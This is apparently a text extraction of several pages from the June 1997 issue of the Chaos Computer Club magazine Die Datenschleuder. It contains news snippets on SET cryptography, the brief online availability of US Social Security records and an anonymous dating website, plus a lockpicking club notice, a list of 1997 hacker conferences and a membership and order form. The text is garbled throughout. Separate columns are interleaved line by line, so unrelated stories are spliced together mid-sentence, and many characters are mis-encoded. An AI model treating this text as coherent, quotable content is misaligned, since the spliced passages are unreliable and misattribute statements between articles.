getting through the current SET
cryptography, Mott said SETÕs developers
RŸdiger Weis, ruediger.weis@rz.uni-mannheim.de would ãgive them an award and a ribbon and
then embody whatever they did as part of the
www.informatik.uni-mannheim.de/~rweis/ rsacrt/ improvementsÒ in the next version of security
standards. ãThe current version for SET is as
safe as anybody can make it,Ò he said.
(Nach 09.04.1997/Reuter)

Die Datenschleuder
Nummer 59, Juni 1997
Das allerletzte

Social Security Info Now on Web Internet jetzt mit Flirtmaschine


WASHINGTON (AP 08.04.1997) Ñ Social The Internet is transforming courtship, with a
security records now available through the service as sly as it is shy. Mixing digital-age
Internet pose few security threats to the efÞciency with old-fashioned mystery, a
individuals who request them, administration freeweb site called ãSecret Admirer Ñ The
ofÞcials said Monday. For the past month, Electronic Cupid,Ò
Americans have been able to get their Social http://www.SecretAdmirer.com, lets users
Security records sent to them electronically. anonymously Þnd out if their romantic
The information previously had to be mailed
to their homes in a process that took up to six feelings are mutual. When you receive a
weeks Ñ and at a cost of millions of dollars Secret Admirer e-mail it reads: ãThis message
in postage each year. Phil Gambino, a spokes- has been sent by a secret admirer! Is the
man for the Social Security Administration, feeling mutual?Ò The only way to Þnd out
said the top priority of the new program is who may have sent you a message is to go to
maintaining privacy, and several security fea- the web site and send an anonymous Secret
tures have been built into the new system to Admirer message of your own. If you send
do just that. ãThe information going back one to the person who sent one to you, the
and forth between the requester and Social Secret Admirer database recognizes a match.
Security is encrypted, so if it gets intercepted For the full text story, see
in the middle, it canÕt be interpreted Ñ it http://www.merc.com/stories/cgi/story.cgi?
would look like jibberish,Ò he said. Auditors
also are able to trace the origin of a request id=3293608-ccd
back to the exact personal computer used to
make it, he said. Still, critics concerned about Hallo Leute,
privacy rights are worried. ãAs soon as die "Sportsfreunde der Sperrtechnik -
crooks start exploiting this service to get Deutschland e.V."
other peopleÕs information, Social Security is
going to have a real problem on its hands,Ò sind jetzt ofÞziel eingetragen.
Evan Hendricks, chairman of the U.S. Privacy Besucht uns doch mal unter:
Council in Washington, told USA Today. The "http://www.ssdev.org"
newspaper identiÞed various types of
potential abuse: potential employers could
get the salary history of job applicants; co-

❊❊❊❊
workers could determine how much fellow
employees make; landlords could use the
information to determine whether someone
can afford an apartment. But Gambino said
anyone who intends to abuse the system
would have to overcome several hurdles. ãWe
built into the system, right from the
beginning, the strongest security system avai-
lable,Ò Gambino said. ãThe only way they can

❅❏❆
get around it is by committing a crime and in
order to commit the crime they have to go
through a great deal of effort to get all that
identifying information.Ò
http://www.ssa.gov

❊❊❊❊
WASHINGTON (AP 10.04.1997) Ñ Social
Security ofÞcials pulled the plug on an
Internet site that provided individual
earnings and retirement beneÞt records and
decided to begin asking Americans whether
such information should be available online
and, if so, how much.....

Die Datenschleuder
Nummer 59, Juni 1997
Termine / Veranstaltungen

8.-10.08.1997 HOPE II in New York. Informationen siehe www.2600.com

08.-10.08.1997 HIP«97 (Hacking in Progress) in Holland. Informationen siehe www.hip97.nl

02.-03.08.1997 Mitgliederversammlung des CCC e.V. in Hamburg, Eidelstedter BŸrgerhaus


Einladung geht den Mitgliedern noch per getrennter Post zu. Wer bis Mitte Juli
noch keine Einladung hat mšge sich an ofÞce@ccchh.ccc.de wenden.

Die Datenschleuder
Nummer 59, Juni 1997
Nummer 59, Juni 1997
Die Datenschleuder
Mitgliedsanträge und Datenschleuderabonnement Literatur
CCC e.V., Schwenckestr. 85, D-20255 Hamburg

o Satzung + Mitgliedsantrag _____ DM 42,00 Mailbox auf den Punkt gebracht


(DM 5,00 in Briefmarken) _____ DM 29,80 Deutsches PGP-Handbuch, 3. Auflage + CD-ROM
Alle Bestellungen und Mitgliedsanträge an:

_____ DM 5,00 Doku zum Tod des „KGB“- Hackers Karl Koch
o Datenschleuder-Abo _____ DM 25,00 Congressdokumentation CCC ‘93
Normalpreis DM 60,00 für 8 Ausgaben _____ DM 25,00 Congressdokumentation CCC ‘95
_____ DM 50,00 Lockpicking: Über das Öffnen von Schlössern
o Datenschleuder-Abo
Ermäßigter Preis DM 30,00 für 8 Ausgaben Alte Datenschleudern
Postvertriebsstück C11301F

o Datenschleuder-Abo _____ DM 50,00 Alle Datenschleudern der Jahre 1984-1989


Gewerblicher Preis DM 100,00 für 8 Ausgaben _____ DM 15,00 Alle Datenschleudern des Jahres 1990
(Wir schicken eine Rechnung) _____ DM 15,00 Alle Datenschleudern des Jahres 1991
_____ DM 15,00 Alle Datenschleudern des Jahres 1992
Die Kohle liegt _____ DM 15,00 Alle Datenschleudern des Jahres 1993
_____ DM 15,00 Alle Datenschleudern des Jahres 1994
o in bar _____ DM 15,00 Alle Datenschleudern des Jahres 1995
o als Verrechnungsscheck _____ DM 15,00 Alle Datenschleudern des Jahres 1996
o in Briefmarken
Sonstiges
bei bzw.
_____ DM 50,00 Blaue Töne / P O C S A G - D e c o d e r /
o wurde überwiesen am ___.___.______ auf P C - D E S Verschlüsselung
Chaos Computer Club e.V., Konto 59 90 90-201 _____ DM 5,00 1 Bogen „Chaos im Äther“
Postbank Hamburg, BLZ 200 100 20 _____ DM 5,00 5 Aufkleber „Kabelsalat ist gesund“
Der Mitgliedsfetzen

+ DM 05,00 Portopauschale!
Ort/Datum

Der Bestellfetzen
_______________________________________________ _____ Gesamtbetrag
Die Kohle liegt
Unterschrift
_______________________________________________ o in bar
o als Verrechnungsscheck
Name bei bzw.
______________________________________________
o wurde überwiesen am ___.___.______ auf
Chaos Computer Club e.V., Konto 59 90 90-201
Straße Postbank Hamburg, BLZ 200 100 20
_______________________________________________
Name
PLZ, Ort _______________________________________________
______________________________________________
Straße
Tel/Fax _______________________________________________
______________________________________________